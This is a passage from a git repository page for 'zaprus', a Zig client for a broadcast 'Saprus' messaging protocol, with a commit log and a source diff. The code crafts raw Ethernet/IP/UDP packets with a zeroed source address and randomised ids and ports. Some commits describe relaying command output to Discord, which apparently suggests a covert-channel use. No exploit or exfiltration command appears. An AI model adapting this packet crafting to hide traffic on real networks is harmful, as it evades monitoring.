75 Commits

Author SHA1 Message Date
f554e7a3bb Kill process after 10 messages or 3 seconds 2026-01-25 23:49:09 -05:00
19c2b78d1d Connection by default 2026-01-25 01:14:02 -05:00
3c5f34d5c2 Set timeouts instead of sleeping 2026-01-24 21:14:40 -05:00
09152377ed Fix reconnection
Was failing to reconnect due to trying to reuse the same socket that
already had a BPF filter on it.
2026-01-24 20:14:22 -05:00
c3b17f8267 Better error handling and debug logging 2026-01-24 19:17:43 -05:00
cf365673b5 Retry timing
Wait 2 minutes when trying the initial connect. Wait 10 minutes if the
connection to the sentinel has timed out.
2026-01-24 18:54:01 -05:00
16fd65e281 Add C API 2026-01-24 17:16:06 -05:00
8965a4d5d4 Skip empty stdin 2026-01-24 14:42:37 -05:00
ba8a84c478 Don't create dangling references
Apparently things die at the end of blk scopes (see the sketch after this commit list).
2026-01-24 14:34:19 -05:00
19d4e88c33 Chunk stdin 2026-01-24 13:11:02 -05:00
3577d538b8 Chunk relay input
This makes it possible to pipe connection command output into the relay
command and direct it somewhere like Discord.
2026-01-24 11:28:18 -05:00
fc9c5bcd5d Chunk messages to 1000 byte payloads 2026-01-24 11:28:18 -05:00
157afa13b1 Fix checksum issue 2026-01-24 10:40:33 -05:00
a81c4b3175 Calculate IPv4 header checksum
This was causing an issue because virtual networks were dropping packets
without the checksum being set.
2026-01-23 23:05:20 -05:00
43f7497424 Simplify tagged union 2026-01-23 22:17:21 -05:00
213a01afc8 Implemented client and connection 2026-01-21 22:25:20 -05:00
067a11ab23 Move RawSocket and clean it up 2026-01-20 23:21:35 -05:00
6db4204bf0 Set don't fragment, and use random id 2026-01-20 22:08:10 -05:00
def8454012 Reconnect on timeout 2026-01-19 19:05:03 -05:00
4106679262 things are SOOOO good.... 2026-01-19 17:55:54 -05:00
01f44949f1 base64 encode payload and don't require connection payload 2026-01-19 17:16:29 -05:00
19126f1203 Attach BPF filter to get all the saprus messages 2026-01-19 17:04:08 -05:00
fec468c508 Complete handshake badly 2026-01-19 15:06:25 -05:00
9359fefdf7 Add real RawSocket deinit 2026-01-19 14:45:29 -05:00
f969d097ab Detect interface and use real mac 2026-01-19 14:43:44 -05:00
cc765dc91b Start adding connection message 2026-01-19 14:08:27 -05:00
abf2cfb366 use disc as default dest 2026-01-19 13:00:28 -05:00
c66b95bf89 Write relay message to the network 2026-01-19 12:59:21 -05:00
d7dedd243e construct full message 2026-01-19 12:30:08 -05:00
9947c21b4c Arrange bytes for relay 2026-01-19 12:12:23 -05:00
8a53c7366a 2026-01-18 17:20:44 -05:00
a33a96dafd start doing packet stuff 2026-01-17 21:38:23 -05:00
1a817df18d Mostly done with parsing and serializing messages 2026-01-17 16:06:47 -05:00
0d9c0c33fa 2026-01-14 19:34:35 -05:00
b3f1b00510 start porting to 0.16.0 2026-01-11 18:06:36 -05:00
7a8874ea6a doing some shenanigans
trying to start writing my own function to do raw socket connections
2026-01-10 21:17:46 -05:00
b39603522f 2025-11-14 14:47:56 -05:00
fc329d1064 2025-10-13 13:28:41 -04:00
3abe3095e6 Remove prints 2025-10-12 21:40:23 -04:00
d6da3cd31b IT'S RIGHT 2025-10-12 21:13:42 -04:00
fe166d2106 Start breaking out net logic to NetWriter 2025-10-12 18:05:34 -04:00
439ee00444 Simplify RawSocketWriter
Does not need to use an allocator anymore.
Just uses the internal buffer properly.
2025-10-12 18:02:56 -04:00
0da7bbda5b Cleanup and use random mac 2025-10-12 14:16:57 -04:00
b06cb6dada it works well! 2025-09-23 16:22:57 -04:00
b8313e4fa4 2025-09-23 15:01:12 -04:00
b5efbd6e16 Write ether headers properly 2025-09-23 14:16:55 -04:00
30243db5c9 2025-09-23 13:33:17 -04:00
c673401c2a Use writer instead of RawSocket in Client 2025-09-09 22:30:31 -04:00
74b0c9ef1f Use 0.15.1 for application 2025-09-09 20:19:48 -04:00
0778889af5 Upgrade deps to 0.15.1 2025-09-09 17:32:59 -04:00
56b6b8a386 Use Client as var type instead of singleton 2025-05-11 13:52:42 -04:00
14ed0bc3f3 Fix issue returning stack pointer 2025-05-11 13:40:55 -04:00
c72503fce6 Fix extra bytes in connection message. 2025-05-11 13:40:23 -04:00
373dbebc8c Add broadcast initial interest using raw sockets
Use this from the relay message
2025-05-11 11:40:15 -04:00
cde289d648 Update gatorcat dep and use bytes for broadcast message
The latter is helpful for the lifetime of the message.
2025-05-11 10:12:26 -04:00
716fb466fa Remove allocation for messages 2025-05-10 21:46:53 -04:00
583f9d8b8f Add comments and fix tests
Also added networkBytesAsValue and restored bytesAsValue.
These are useful for treating the bytes from the network directly as a Message.
Otherwise, the init function would overwrite the packet type and length to be correct.
I would like the message handling to fail if the message body is incorrect.
2025-05-10 21:46:53 -04:00
56e72928c6 fix use after free 2025-05-10 21:46:53 -04:00
a80c9abfe7 Attempt to base64 encode the connection payload
For some reason I am still getting this:

2025/05/10 16:37:06 Error decoding message: SGVsbG8gZGFya25lc3MgbXkgb2xkIGZyaWVuZA==::53475673624738675a4746796132356c63334d6762586b676232786b49475a79615756755a413d3daaaa
2025-05-10 21:46:53 -04:00
245dab4909 Use slice for init, and add better error sets.
The slice lets us avoid allocating within the init function.
This means init can't fail, and it also makes it easier to stack allocate messages (slice an array buffer, instead of creating a stack allocator).
2025-05-10 21:46:53 -04:00
cde5c3626c 2025-05-10 21:46:53 -04:00
e84d1a2300 2025-05-10 21:46:53 -04:00
1b7d9bbb1a Remove bytesAsValueUnchecked
Callers can instead use std.mem.bytesAsValue directly.
2025-05-10 21:46:53 -04:00
1512ec1a86 Cleanup asBytes and test it 2025-05-10 21:46:53 -04:00
f1dce257be Simplify init interface 2025-05-10 21:46:53 -04:00
bcab1e4d00 2025-05-10 21:46:53 -04:00
0e8f016978 Align the bytes instead of the struct 2025-05-10 21:46:53 -04:00
fc53e87389 2025-05-10 21:46:53 -04:00
cbf554e853 2025-05-10 21:46:53 -04:00
775212013f 2025-05-10 21:46:53 -04:00
339ac5cfe5 2025-05-10 21:46:53 -04:00
eacfaffb6b 2025-05-10 21:46:53 -04:00
1731b2e643 2025-05-10 21:46:53 -04:00
dae66a0039 Starting real connections 2025-05-10 21:46:53 -04:00
683a2015b0 Use FAIL as the default dest if unable to parse 2025-04-27 18:03:06 -04:00
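
A minimal sketch (hypothetical code, not from this repository) of the scope pitfall behind the "Don't create dangling references" commit above: an interface captured from a value that dies at the end of its scope is left dangling, and the fix is to give that value storage that outlives the scope.

var rand: ?std.Random = null;

fn badInit() void {
    var prng = std.Random.DefaultPrng.init(0);
    // `prng.random()` stores a pointer to `prng`, and `prng` dies when this
    // scope ends, so the global `rand` is left dangling.
    rand = prng.random();
}

// Fix: keep the PRNG in storage that outlives the initializing scope.
var prng_storage: std.Random.DefaultPrng = undefined;

fn goodInit() void {
    prng_storage = std.Random.DefaultPrng.init(0);
    rand = prng_storage.random();
}

test goodInit {
    goodInit();
    _ = rand.?.int(u8);
}

const std = @import("std");
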
11 changed files with 1097 additions and 499 deletions

build.zig

@@ -1,89 +1,129 @@
const std = @import("std");
const Step = std.Build.Step;
// Although this function looks imperative, note that its job is to
// declaratively construct a build graph that will be executed by an external
// runner.
// Although this function looks imperative, it does not perform the build
// directly and instead it mutates the build graph (`b`) that will be then
// executed by an external runner. The functions in `std.Build` implement a DSL
// for defining build steps and express dependencies between them, allowing the
// build runner to parallelize the build automatically (and the cache system to
// know when a step doesn't need to be re-run).
pub fn build(b: *std.Build) void {
// Standard target options allows the person running `zig build` to choose
// Standard target options allow the person running `zig build` to choose
// what target to build for. Here we do not override the defaults, which
// means any target is allowed, and the default is native. Other options
// for restricting supported target set are available.
const target = b.standardTargetOptions(.{});
// Standard optimization options allow the person running `zig build` to select
// between Debug, ReleaseSafe, ReleaseFast, and ReleaseSmall. Here we do not
// set a preferred release mode, allowing the user to decide how to optimize.
const optimize = b.standardOptimizeOption(.{});
// It's also possible to define more custom flags to toggle optional features
// of this build script using `b.option()`. All defined flags (including
// target and optimize options) will be listed when running `zig build --help`
// in this directory.
const lib_mod = b.createModule(.{
// This creates a module, which represents a collection of source files alongside
// some compilation options, such as optimization mode and linked system libraries.
// Zig modules are the preferred way of making Zig code available to consumers.
// addModule defines a module that we intend to make available for importing
// to our consumers. We must give it a name because a Zig package can expose
// multiple modules and consumers will need to be able to specify which
// module they want to access.
const mod = b.addModule("zaprus", .{
// The root source file is the "entry point" of this module. Users of
// this module will only be able to access public declarations contained
// in this file, which means that if you have declarations that you
// intend to expose to consumers that were defined in other files part
// of this module, you will have to make sure to re-export them from
// the root file.
.root_source_file = b.path("src/root.zig"),
// Later on we'll use this module as the root module of a test executable
// which requires us to specify a target.
.target = target,
});
// Create static library
const lib = b.addLibrary(.{
.name = "zaprus",
.root_module = b.createModule(.{
.root_source_file = b.path("src/c_api.zig"),
.target = target,
.optimize = optimize,
.link_libc = true,
.imports = &.{
.{ .name = "zaprus", .module = mod },
},
}),
});
// We will also create a module for our other entry point, 'main.zig'.
const exe_mod = b.createModule(.{
// `root_source_file` is the Zig "entry point" of the module. If a module
// only contains e.g. external object files, you can make this `null`.
// In this case the main source file is merely a path, however, in more
// complicated build scripts, this could be a generated file.
.root_source_file = b.path("src/main.zig"),
.target = target,
.optimize = optimize,
});
b.installArtifact(lib);
lib.installHeader(b.path("include/zaprus.h"), "zaprus.h");
lib_mod.addImport("network", b.dependency("network", .{}).module("network"));
exe_mod.addImport("zaprus", lib_mod);
exe_mod.addImport("clap", b.dependency("clap", .{}).module("clap"));
const static_lib = b.addLibrary(.{
.linkage = .static,
.name = "zaprus",
.root_module = lib_mod,
});
b.installArtifact(static_lib);
const dynamic_lib = b.addLibrary(.{
.linkage = .dynamic,
.name = "zaprus",
.root_module = lib_mod,
});
b.installArtifact(dynamic_lib);
// C Headers
const c_header = b.addInstallFileWithDir(
b.path("include/zaprus.h"),
.header,
"zaprus.h",
);
b.getInstallStep().dependOn(&c_header.step);
// This creates another `std.Build.Step.Compile`, but this one builds an executable
// rather than a static library.
// Here we define an executable. An executable needs to have a root module
// which needs to expose a `main` function. While we could add a main function
// to the module defined above, it's sometimes preferable to split business
// logic and the CLI into two separate modules.
//
// If your goal is to create a Zig library for others to use, consider if
// it might benefit from also exposing a CLI tool. A parser library for a
// data serialization format could also bundle a CLI syntax checker, for example.
//
// If instead your goal is to create an executable, consider if users might
// be interested in also being able to embed the core functionality of your
// program in their own executable in order to avoid the overhead involved in
// subprocessing your CLI tool.
//
// If neither case applies to you, feel free to delete the declaration you
// don't need and to put everything under a single module.
const exe = b.addExecutable(.{
.name = "zaprus",
.root_module = exe_mod,
.root_module = b.createModule(.{
// b.createModule defines a new module just like b.addModule but,
// unlike b.addModule, it does not expose the module to consumers of
// this package, which is why in this case we don't have to give it a name.
.root_source_file = b.path("src/main.zig"),
// Target and optimization levels must be explicitly wired in when
// defining an executable or library (in the root module), and you
// can also hardcode a specific target for an executable or library
// definition if desirable (e.g. firmware for embedded devices).
.target = target,
.optimize = optimize,
// List of modules available for import in source files part of the
// root module.
.imports = &.{
// Here "zaprus" is the name you will use in your source code to
// import this module (e.g. `@import("zaprus")`). The name is
// repeated because you are allowed to rename your imports, which
// can be extremely useful in case of collisions (which can happen
// importing modules from different packages).
.{ .name = "zaprus", .module = mod },
},
}),
});
// This declares intent for the executable to be installed into the
// standard location when the user invokes the "install" step (the default
// step when running `zig build`).
// install prefix when running `zig build` (i.e. when executing the default
// step). By default the install prefix is `zig-out/` but can be overridden
// by passing `--prefix` or `-p`.
b.installArtifact(exe);
// This *creates* a Run step in the build graph, to be executed when another
// step is evaluated that depends on it. The next line below will establish
// such a dependency.
const run_cmd = b.addRunArtifact(exe);
// This creates a top level step. Top level steps have a name and can be
// invoked by name when running `zig build` (e.g. `zig build run`).
// This will evaluate the `run` step rather than the default step.
// For a top level step to actually do something, it must depend on other
// steps (e.g. a Run step, as we will see in a moment).
const run_step = b.step("run", "Run the app");
// By making the run step depend on the install step, it will be run from the
// This creates a RunArtifact step in the build graph. A RunArtifact step
// invokes an executable compiled by Zig. Steps will only be executed by the
// runner if invoked directly by the user (in the case of top level steps)
// or if another step depends on it, so it's up to you to define when and
// how this Run step will be executed. In our case we want to run it when
// the user runs `zig build run`, so we create a dependency link.
const run_cmd = b.addRunArtifact(exe);
run_step.dependOn(&run_cmd.step);
// By making the run step depend on the default step, it will be run from the
// installation directory rather than directly from within the cache directory.
// This is not necessary, however, if the application depends on other installed
// files, this ensures they will be present and in the expected location.
run_cmd.step.dependOn(b.getInstallStep());
// This allows the user to pass arguments to the application in the build
@@ -92,21 +132,42 @@ pub fn build(b: *std.Build) void {
run_cmd.addArgs(args);
}
// This creates a build step. It will be visible in the `zig build --help` menu,
// and can be selected like this: `zig build run`
// This will evaluate the `run` step rather than the default, which is "install".
const run_step = b.step("run", "Run the app");
run_step.dependOn(&run_cmd.step);
const exe_unit_tests = b.addTest(.{
.root_module = exe_mod,
// Creates an executable that will run `test` blocks from the provided module.
// Here `mod` needs to define a target, which is why earlier we made sure to
// set the relevant field.
const mod_tests = b.addTest(.{
.root_module = mod,
});
const run_exe_unit_tests = b.addRunArtifact(exe_unit_tests);
// A run step that will run the test executable.
const run_mod_tests = b.addRunArtifact(mod_tests);
// Similar to creating the run step earlier, this exposes a `test` step to
// the `zig build --help` menu, providing a way for the user to request
// running the unit tests.
const test_step = b.step("test", "Run unit tests");
test_step.dependOn(&run_exe_unit_tests.step);
// Creates an executable that will run `test` blocks from the executable's
// root module. Note that test executables only test one module at a time,
// hence why we have to create two separate ones.
const exe_tests = b.addTest(.{
.root_module = exe.root_module,
});
// A run step that will run the second test executable.
const run_exe_tests = b.addRunArtifact(exe_tests);
// A top level step for running all tests. dependOn can be called multiple
// times and since the two run steps do not depend on one another, this will
// make the two of them run in parallel.
const test_step = b.step("test", "Run tests");
test_step.dependOn(&run_mod_tests.step);
test_step.dependOn(&run_exe_tests.step);
// Just like flags, top level steps are also listed in the `--help` menu.
//
// The Zig build system is entirely implemented in userland, which means
// that it cannot hook into private compiler APIs. All compilation work
// orchestrated by the build system will result in other Zig compiler
// subcommands being invoked with the right flags defined. You can observe
// these invocations when one fails (or you pass a flag to increase
// verbosity) to validate assumptions and diagnose problems.
//
// Lastly, the Zig build system is relatively simple and self-contained,
// and reading its source code will allow you to master it.
}

build.zig.zon

@@ -10,7 +10,7 @@
// This is a [Semantic Version](https://semver.org/).
// In a future version of Zig it will be used for package deduplication.
.version = "0.0.0",
.version = "0.1.0",
// Together with name, this represents a globally unique package
// identifier. This field is generated by the Zig toolchain when the
@@ -28,23 +28,14 @@
// Tracks the earliest Zig version that the package considers to be a
// supported use case.
.minimum_zig_version = "0.14.0",
.minimum_zig_version = "0.16.0",
// This field is optional.
// Each dependency must either provide a `url` and `hash`, or a `path`.
// `zig build --fetch` can be used to fetch all dependencies of a package, recursively.
// Once all dependencies are fetched, `zig build` no longer requires
// internet connectivity.
.dependencies = .{
.network = .{
.url = "https://github.com/ikskuh/zig-network/archive/c76240d2240711a3dcbf1c0fb461d5d1f18be79a.zip",
.hash = "network-0.1.0-AAAAAOwlAQAQ6zKPUrsibdpGisxld9ftUKGdMvcCSpaj",
},
.clap = .{
.url = "git+https://github.com/Hejsil/zig-clap?ref=0.10.0#e47028deaefc2fb396d3d9e9f7bd776ae0b2a43a",
.hash = "clap-0.10.0-oBajB434AQBDh-Ei3YtoKIRxZacVPF1iSwp3IX_ZB8f0",
},
},
.dependencies = .{},
.paths = .{
"build.zig",
"build.zig.zon",

include/zaprus.h

@@ -1,24 +1,33 @@
// client
#ifndef ZAPRUS_H
#define ZAPRUS_H
int zaprus_init(void);
#include <stdint.h>
#include <stdlib.h>
int zaprus_deinit(void);
typedef void* zaprus_client;
typedef void* zaprus_connection;
int zaprus_send_relay(const char* payload, usize len, char[4] dest);
// Returns NULL if there was an error.
zaprus_client zaprus_init_client(void);
int zaprus_send_initial_connection(const char* payload, usize len, uint16_t initial_port);
void zaprus_deinit_client(zaprus_client client);
struct SaprusMessage* zaprus_connect(const char* payload, usize len);
// Returns 0 on success, else returns 1.
int zaprus_client_send_relay(zaprus_client client, const char* payload, size_t payload_len, const char dest[4]);
// message
struct SaprusMessage {
// Returns NULL if there was an error.
// Caller should call zaprus_deinit_connection when done with the connection.
zaprus_connection zaprus_connect(zaprus_client client, const char* payload, size_t payload_len);
};
void zaprus_deinit_connection(zaprus_connection connection);
// ptr should be freed by the caller.
int zaprus_message_to_bytes(struct SaprusMessage msg, char** ptr, usize* len);
// Capacity is the maximum length of the output buffer.
// out_len is modified to specify how much of the capacity is used by the response.
// Blocks until the next message is available, or returns 1 if the underlying socket times out.
// Returns 0 on success, else returns 1.
int zaprus_connection_next(zaprus_connection connection, char *out, size_t capacity, size_t *out_len);
// Return value should be destroyed with zaprus_message_deinit.
struct SaprusMessage* zaprus_message_from_bytes(const char* bytes, usize len);
// Returns 0 on success, else returns 1.
int zaprus_connection_send(zaprus_connection connection, const char *payload, size_t payload_len);
void zaprus_message_deinit(struct SaprusMessage* msg);
#endif // ZAPRUS_H

src/Client.zig

@@ -1,124 +1,146 @@
var rand: ?Random = null;
const base64_enc = std.base64.standard.Encoder;
const base64_dec = std.base64.standard.Decoder;
pub fn init() !void {
var prng = Random.DefaultPrng.init(blk: {
var seed: u64 = undefined;
try posix.getrandom(mem.asBytes(&seed));
break :blk seed;
});
rand = prng.random();
try network.init();
const Client = @This();
const max_message_size = 2048;
pub const max_payload_len = RawSocket.max_payload_len;
socket: RawSocket,
pub fn init() !Client {
const socket: RawSocket = try .init();
return .{
.socket = socket,
};
}
pub fn deinit() void {
network.deinit();
pub fn deinit(self: *Client) void {
self.socket.deinit();
self.* = undefined;
}
fn broadcastSaprusMessage(msg: SaprusMessage, udp_port: u16, allocator: Allocator) !void {
const msg_bytes = try msg.toBytes(allocator);
defer allocator.free(msg_bytes);
pub fn sendRelay(self: *Client, io: Io, payload: []const u8, dest: [4]u8) !void {
const io_source: std.Random.IoSource = .{ .io = io };
const rand = io_source.interface();
var sock = try network.Socket.create(.ipv4, .udp);
defer sock.close();
try sock.setBroadcast(true);
// Bind to 0.0.0.0:0
const bind_addr = network.EndPoint{
.address = network.Address{ .ipv4 = network.Address.IPv4.any },
.port = 0,
var headers: EthIpUdp = .{
.src_mac = self.socket.mac,
.ip = .{
.id = rand.int(u16),
.src_addr = 0, //rand.int(u32),
.dst_addr = @bitCast([_]u8{ 255, 255, 255, 255 }),
.len = undefined,
},
.udp = .{
.src_port = rand.intRangeAtMost(u16, 1025, std.math.maxInt(u16)),
.dst_port = 8888,
.len = undefined,
},
};
const dest_addr = network.EndPoint{
.address = network.Address{ .ipv4 = network.Address.IPv4.broadcast },
.port = udp_port,
};
try sock.bind(bind_addr);
_ = try sock.sendTo(dest_addr, msg_bytes);
}
pub fn sendRelay(payload: []const u8, dest: [4]u8, allocator: Allocator) !void {
const msg = SaprusMessage{
const relay: SaprusMessage = .{
.relay = .{
.header = .{ .dest = dest },
.dest = .fromBytes(&dest),
.payload = payload,
},
};
try broadcastSaprusMessage(msg, 8888, allocator);
var relay_buf: [max_message_size - (@bitSizeOf(EthIpUdp) / 8)]u8 = undefined;
const relay_bytes = relay.toBytes(&relay_buf);
headers.setPayloadLen(relay_bytes.len);
var msg_buf: [max_message_size]u8 = undefined;
var msg_w: Writer = .fixed(&msg_buf);
msg_w.writeAll(&headers.toBytes()) catch unreachable;
msg_w.writeAll(relay_bytes) catch unreachable;
const full_msg = msg_w.buffered();
try self.socket.send(full_msg);
}
fn randomPort() u16 {
var p: u16 = 0;
if (rand) |r| {
p = r.intRangeAtMost(u16, 1024, 65000);
} else unreachable;
pub fn connect(self: Client, io: Io, payload: []const u8) !SaprusConnection {
const io_source: std.Random.IoSource = .{ .io = io };
const rand = io_source.interface();
return p;
}
var headers: EthIpUdp = .{
.src_mac = self.socket.mac,
.ip = .{
.id = rand.int(u16),
.src_addr = 0, //rand.int(u32),
.dst_addr = @bitCast([_]u8{ 255, 255, 255, 255 }),
.len = undefined,
},
.udp = .{
.src_port = rand.intRangeAtMost(u16, 1025, std.math.maxInt(u16)),
.dst_port = 8888,
.len = undefined,
},
};
pub fn sendInitialConnection(payload: []const u8, initial_port: u16, allocator: Allocator) !SaprusMessage {
const dest_port = randomPort();
const msg = SaprusMessage{
// udp dest port should not be 8888 after first
const udp_dest_port = rand.intRangeAtMost(u16, 9000, std.math.maxInt(u16));
var connection: SaprusMessage = .{
.connection = .{
.header = .{
.src_port = initial_port,
.dest_port = dest_port,
},
.src = rand.intRangeAtMost(u16, 1025, std.math.maxInt(u16)),
.dest = rand.intRangeAtMost(u16, 1025, std.math.maxInt(u16)),
.seq = undefined,
.id = undefined,
.payload = payload,
},
};
try broadcastSaprusMessage(msg, 8888, allocator);
return msg;
}
pub fn connect(payload: []const u8, allocator: Allocator) !?SaprusMessage {
var initial_port: u16 = 0;
if (rand) |r| {
initial_port = r.intRangeAtMost(u16, 1024, 65000);
} else unreachable;
var initial_conn_res: ?SaprusMessage = null;
errdefer if (initial_conn_res) |c| c.deinit(allocator);
var sock = try network.Socket.create(.ipv4, .udp);
defer sock.close();
// Bind to 255.255.255.255:8888
const bind_addr = network.EndPoint{
.address = network.Address{ .ipv4 = network.Address.IPv4.broadcast },
.port = 8888,
log.debug("Setting bpf filter to port {}", .{connection.connection.src});
self.socket.attachSaprusPortFilter(connection.connection.src) catch |err| {
log.err("Failed to set port filter: {t}", .{err});
return err;
};
log.debug("bpf set", .{});
// timeout 1s
try sock.setReadTimeout(1 * std.time.us_per_s);
try sock.bind(bind_addr);
var connection_buf: [2048]u8 = undefined;
var connection_bytes = connection.toBytes(&connection_buf);
headers.setPayloadLen(connection_bytes.len);
const msg = try sendInitialConnection(payload, initial_port, allocator);
log.debug("Building full message", .{});
var msg_buf: [2048]u8 = undefined;
var msg_w: Writer = .fixed(&msg_buf);
msg_w.writeAll(&headers.toBytes()) catch unreachable;
msg_w.writeAll(connection_bytes) catch unreachable;
var full_msg = msg_w.buffered();
log.debug("Built full message. Sending message", .{});
var response_buf: [4096]u8 = undefined;
_ = try sock.receive(&response_buf); // Ignore message that I sent.
const len = try sock.receive(&response_buf);
try self.socket.send(full_msg);
var res_buf: [4096]u8 = undefined;
initial_conn_res = try SaprusMessage.fromBytes(response_buf[0..len], allocator);
log.debug("Awaiting handshake response", .{});
// Ignore response from sentinel, just accept that we got one.
_ = try self.socket.receive(&res_buf);
// Complete handshake after awaiting response
try broadcastSaprusMessage(msg, randomPort(), allocator);
headers.udp.dst_port = udp_dest_port;
headers.ip.id = rand.int(u16);
headers.setPayloadLen(connection_bytes.len);
return initial_conn_res;
log.debug("Building final handshake message", .{});
msg_w.end = 0;
msg_w.writeAll(&headers.toBytes()) catch unreachable;
msg_w.writeAll(connection_bytes) catch unreachable;
full_msg = msg_w.buffered();
try self.socket.send(full_msg);
return .init(self.socket, headers, connection);
}
const RawSocket = @import("./RawSocket.zig");
const SaprusMessage = @import("message.zig").Message;
const SaprusConnection = @import("Connection.zig");
const EthIpUdp = @import("./EthIpUdp.zig").EthIpUdp;
const std = @import("std");
const Random = std.Random;
const posix = std.posix;
const mem = std.mem;
const network = @import("network");
const Allocator = mem.Allocator;
const Io = std.Io;
const Writer = std.Io.Writer;
const log = std.log;

src/Connection.zig Normal file

@@ -0,0 +1,61 @@
socket: RawSocket,
headers: EthIpUdp,
connection: SaprusMessage,
const Connection = @This();
pub fn init(socket: RawSocket, headers: EthIpUdp, connection: SaprusMessage) Connection {
return .{
.socket = socket,
.headers = headers,
.connection = connection,
};
}
pub fn next(self: Connection, io: Io, buf: []u8) ![]const u8 {
_ = io;
log.debug("Awaiting connection message", .{});
const res = try self.socket.receive(buf);
log.debug("Received {} byte connection message", .{res.len});
const msg: SaprusMessage = try .parse(res[42..]);
const connection_res = msg.connection;
log.debug("Payload was {s}", .{connection_res.payload});
return connection_res.payload;
}
pub fn send(self: *Connection, io: Io, buf: []const u8) !void {
const io_source: std.Random.IoSource = .{ .io = io };
const rand = io_source.interface();
log.debug("Sending connection message", .{});
self.connection.connection.payload = buf;
var connection_bytes_buf: [2048]u8 = undefined;
const connection_bytes = self.connection.toBytes(&connection_bytes_buf);
self.headers.ip.id = rand.int(u16);
self.headers.setPayloadLen(connection_bytes.len);
var msg_buf: [2048]u8 = undefined;
var msg_w: Writer = .fixed(&msg_buf);
try msg_w.writeAll(&self.headers.toBytes());
try msg_w.writeAll(connection_bytes);
const full_msg = msg_w.buffered();
try self.socket.send(full_msg);
log.debug("Sent {} byte connection message", .{full_msg.len});
}
const std = @import("std");
const Io = std.Io;
const Writer = std.Io.Writer;
const log = std.log;
const SaprusMessage = @import("./message.zig").Message;
const EthIpUdp = @import("./EthIpUdp.zig").EthIpUdp;
const RawSocket = @import("./RawSocket.zig");
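
A minimal end-to-end sketch (not part of the diff) of how the Client and Connection APIs above fit together, using the same single-threaded Io instance the C API obtains. Payloads are passed already base64 encoded, as main.zig does before calling sendRelay and connect; the names here are illustrative only.

fn example() !void {
    const io = std.Io.Threaded.global_single_threaded.io();

    var client: zaprus.Client = try .init();
    defer client.deinit();

    // One-shot relay broadcast to the default "disc" destination.
    try client.sendRelay(io, "SGVsbG8=", "disc".*);

    // Handshake, then exchange messages over the resulting connection.
    var connection = try client.connect(io, "SGVsbG8=");
    var buf: [2048]u8 = undefined;
    const reply = try connection.next(io, &buf);
    try connection.send(io, reply);
}

const zaprus = @import("zaprus");
const std = @import("std");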

src/EthIpUdp.zig Normal file

@@ -0,0 +1,93 @@
pub const EthIpUdp = packed struct(u336) { // 42 bytes * 8 bits = 336
// --- UDP (Last in memory, defined first for LSB->MSB) ---
udp: packed struct {
checksum: u16 = 0,
len: u16,
dst_port: u16,
src_port: u16,
},
// --- IP ---
ip: packed struct {
dst_addr: u32,
src_addr: u32,
header_checksum: u16 = 0,
protocol: u8 = 17, // udp
ttl: u8 = 0x40,
// fragment_offset (13 bits) + flags (3 bits) = 16 bits
// In Big Endian, flags are the high bits of the first byte.
// To have flags appear first in the stream, define them last here.
fragment_offset: u13 = 0,
flags: packed struct(u3) {
reserved: u1 = 0,
dont_fragment: u1 = 1,
more_fragments: u1 = 0,
} = .{},
id: u16,
len: u16,
tos: u8 = undefined,
// ip_version (4 bits) + ihl (4 bits) = 8 bits
// To have version appear first (high nibble), define it last.
ihl: u4 = 5,
ip_version: u4 = 4,
},
// --- Ethernet ---
eth_type: u16 = std.os.linux.ETH.P.IP,
src_mac: @Vector(6, u8),
dst_mac: @Vector(6, u8) = @splat(0xff),
pub fn toBytes(self: @This()) [336 / 8]u8 {
var res: [336 / 8]u8 = undefined;
var w: Writer = .fixed(&res);
w.writeStruct(self, .big) catch unreachable;
return res;
}
pub fn setPayloadLen(self: *@This(), len: usize) void {
self.ip.len = @intCast(len + (@bitSizeOf(@TypeOf(self.udp)) / 8) + (@bitSizeOf(@TypeOf(self.ip)) / 8));
// Zero the checksum field before calculation
self.ip.header_checksum = 0;
// Serialize IP header to big-endian bytes
var ip_bytes: [@bitSizeOf(@TypeOf(self.ip)) / 8]u8 = undefined;
var w: Writer = .fixed(&ip_bytes);
w.writeStruct(self.ip, .big) catch unreachable;
// Calculate checksum over serialized bytes
self.ip.header_checksum = onesComplement16(&ip_bytes);
self.udp.len = @intCast(len + (@bitSizeOf(@TypeOf(self.udp)) / 8));
}
};
fn onesComplement16(data: []const u8) u16 {
var sum: u32 = 0;
// Process pairs of bytes as 16-bit words
var i: usize = 0;
while (i + 1 < data.len) : (i += 2) {
const word: u16 = (@as(u16, data[i]) << 8) | data[i + 1];
sum += word;
}
// Handle odd byte if present
if (data.len % 2 == 1) {
sum += @as(u32, data[data.len - 1]) << 8;
}
// Fold 32-bit sum to 16 bits
while (sum >> 16 != 0) {
sum = (sum & 0xFFFF) + (sum >> 16);
}
// Return ones' complement
return ~@as(u16, @truncate(sum));
}
const std = @import("std");
const Writer = std.Io.Writer;
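
A sanity check for onesComplement16 above (not part of the diff): the textbook IPv4 header example, 45 00 00 73 00 00 40 00 40 11 [checksum] c0 a8 00 01 c0 a8 00 c7, checksums to 0xB861 once the checksum field itself is zeroed.

test "onesComplement16 matches the textbook IPv4 header example" {
    const header = [_]u8{
        0x45, 0x00, 0x00, 0x73, 0x00, 0x00, 0x40, 0x00,
        0x40, 0x11, 0x00, 0x00, // checksum bytes zeroed for the calculation
        0xc0, 0xa8, 0x00, 0x01, 0xc0, 0xa8, 0x00, 0xc7,
    };
    try std.testing.expectEqual(@as(u16, 0xb861), onesComplement16(&header));
}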

src/RawSocket.zig Normal file

@@ -0,0 +1,167 @@
const RawSocket = @This();
const is_debug = builtin.mode == .Debug;
fd: i32,
sockaddr_ll: std.posix.sockaddr.ll,
mac: [6]u8,
pub const max_payload_len = 1000;
const Ifconf = extern struct {
ifc_len: i32,
ifc_ifcu: extern union {
ifcu_buf: ?[*]u8,
ifcu_req: ?[*]std.os.linux.ifreq,
},
};
pub fn init() !RawSocket {
const socket: i32 = std.math.cast(i32, std.os.linux.socket(std.os.linux.AF.PACKET, std.os.linux.SOCK.RAW, 0)) orelse return error.SocketError;
if (socket < 0) return error.SocketError;
var ifreq_storage: [16]std.os.linux.ifreq = undefined;
var ifc = Ifconf{
.ifc_len = @sizeOf(@TypeOf(ifreq_storage)),
.ifc_ifcu = .{ .ifcu_req = &ifreq_storage },
};
if (std.os.linux.ioctl(socket, std.os.linux.SIOCGIFCONF, @intFromPtr(&ifc)) != 0) {
return error.NicError;
}
const count = @divExact(ifc.ifc_len, @sizeOf(std.os.linux.ifreq));
// Get the first non loopback interface
var ifr = for (ifreq_storage[0..@intCast(count)]) |*ifr| {
if (std.os.linux.ioctl(socket, std.os.linux.SIOCGIFFLAGS, @intFromPtr(ifr)) == 0) {
